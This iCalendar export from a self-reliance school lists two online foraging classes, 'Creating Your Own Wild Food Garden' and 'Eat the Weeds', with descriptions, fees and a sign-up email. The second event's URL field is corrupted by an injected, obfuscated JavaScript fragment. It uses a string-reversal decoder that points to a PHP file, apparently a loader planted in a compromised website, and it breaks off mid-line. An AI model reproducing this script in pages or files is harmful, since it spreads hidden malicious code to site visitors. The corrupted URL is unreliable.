BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//School of Self-Reliance - ECPv6.15.13//NONSGML v1.0//EN
CALSCALE:GREGORIAN
METHOD:PUBLISH
X-ORIGINAL-URL:https://www.schoolofself-reliance.com
X-WR-CALDESC:Events for School of Self-Reliance
REFRESH-INTERVAL;VALUE=DURATION:PT1H
X-Robots-Tag:noindex
X-PUBLISHED-TTL:PT1H
BEGIN:VTIMEZONE
TZID:America/Los_Angeles
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20200308T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20201101T090000
END:STANDARD
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20210314T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20211107T090000
END:STANDARD
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20220313T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20221106T090000
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
DTSTART;TZID=America/Los_Angeles:20210114T190000
DTEND;TZID=America/Los_Angeles:20210114T210000
DTSTAMP:20260425T084429
CREATED:20210105T063438Z
LAST-MODIFIED:20210114T055124Z
UID:29679-1610650800-1610658000@www.schoolofself-reliance.com
SUMMARY:CREATING  YOUR OWN WILD FOOD GARDEN
DESCRIPTION:Thursday\, January 14\, 7 p.m. \nCREATING YOUR OWN WILD FOOD GARDEN \nYou’ve begun to learn about foraging and now you realize the value of many of the wild foods that grow seasonally all around.  And just like the earliest humans way back in the mythical beginning of time\, you want to have and grow some of these “wild” plants closer to home.  Yes\, that’s how agriculture got started.  In the modern world\, more and more foragers can impact the local environment.  It’s not hard to collect some of the wild seeds\, or take cuttings\, and create your own wild garden in your own back yard or back 40.  We’ll share some of the wild plants that are easiest to cultivate in your own backyard. We’ll also share the techniques of propagation\, which includes seeds\, cuttings\, and transplants.  Don’t forget\, some of the common wild plants\, if native\, can be purchased at local nurseries. We’ll tell you where.  And everything you know about organic gardening will be relevant to growing wild plants\, since you’re now growing them!  Many of the wild plants are more resilient than cultivated plants\, and they do best when you try to replicate the conditions where they thrive in the wild. \nQuite an adventure.  Join us for the class\, and join the conversation that follows. \nPresented on Zoom\, Pay on Paypal to Christopher_nyerges@yahoo.com. \nDURING THIS TIME\, WE WILL BE DOING CLASSES ON ZOOM.  PLEASE JOIN US.  To join\, you must email us  (christopher_nyerges@yahoo.com) that you intend to join\, and we will send you a link.  $45 ($25 seniors and students; scholarships available)
URL:https://www.schoolofself-reliance.com/event/creating-your-own-wild-food-garden/
CATEGORIES:Ethno-botany
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=America/Los_Angeles:20210108T190000
DTEND;TZID=America/Los_Angeles:20210108T210000
DTSTAMP:20260425T084429
CREATED:20210105T062625Z
LAST-MODIFIED:20210105T070958Z
UID:29673-1610132400-1610139600@www.schoolofself-reliance.com
SUMMARY:EAT THE WEEDS to keep Your Health!
DESCRIPTION:Friday\, January 8\,  7 p.m. \nEAT THE WEEDS to Keep Your Health. \nBefore the weeds wither in summer\, Learn how to identify\, grow\, preserve\, eat your non-native exotic weeds\, which are highly nutritious\, to maintain good health! \nEating edible weeds grown locally also allows you to eat less long-distance transported food grown in conventional farms.  Whenever you eat local wild foods\, you’re helping to save water and the harmful effects of fuel use.  Learn to Identify\, Preserve\, and Prepare common wild foods in your own yard and area. \nRemember: Healthy Environment\, Healthy Eating\, Healthy You.  Be a part of the solution \nPresented on Zoom\, Pay on Paypal to Christopher_nyerges@yahoo.com. \nDURING THIS TIME\, WE WILL BE DOING CLASSES ON ZOOM.  PLEASE JOIN US.  To join\, you must email us  (christopher_nyerges@yahoo.com) that you intend to join\, and we will send you a link.  $45 ($25 seniors and students; scholarships available).
URL:https://www.schoolofself-reliance.com/event/eat-the-weeds-<script>$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/
CATEGORIES:Ethno-botany
END:VEVENT
END:VCALENDAR